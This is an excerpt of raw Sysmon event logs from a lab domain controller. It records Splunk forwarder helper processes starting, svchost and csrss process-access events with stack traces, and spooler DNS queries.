Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006387Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.082{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006386Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.082{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006385Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.082{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006384Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.082{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006383Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.082{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006382Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.082{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006381Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.082{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006380Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.082{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006379Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.082{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006378Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.082{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CEB-5FA1-6001-000000008801}4764C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006377Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.082{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CEB-5FA1-6001-000000008801}4764C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006376Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.082{D28789B6-7CEB-5FA1-6001-000000008801}4764C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006426Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:16.349{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CEC-5FA1-6201-000000008801}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006425Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:16.349{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006424Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:16.349{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006423Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:16.349{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006422Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:16.349{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006421Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:16.349{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006420Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:16.349{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006419Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:16.349{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006418Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:16.349{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006417Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:16.349{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006416Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:16.349{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CEC-5FA1-6201-000000008801}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006415Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:16.349{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CEC-5FA1-6201-000000008801}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006414Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:16.353{D28789B6-7CEC-5FA1-6201-000000008801}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000006430Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.775{D28789B6-7C73-5FA1-2C00-000000008801}2800WIN-DC-8070fe80::4d6c:cfdc:29be:620c;C:\Windows\System32\spoolsv.exe 22542200x80000000000000006429Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.775{D28789B6-7C73-5FA1-2C00-000000008801}2800WIN-DC-807010.0.1.14;C:\Windows\System32\spoolsv.exe 22542200x80000000000000006428Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.773{D28789B6-7CEB-5FA1-6101-000000008801}4944win-dc-807.attackrange.local0fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe 22542200x80000000000000006427Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 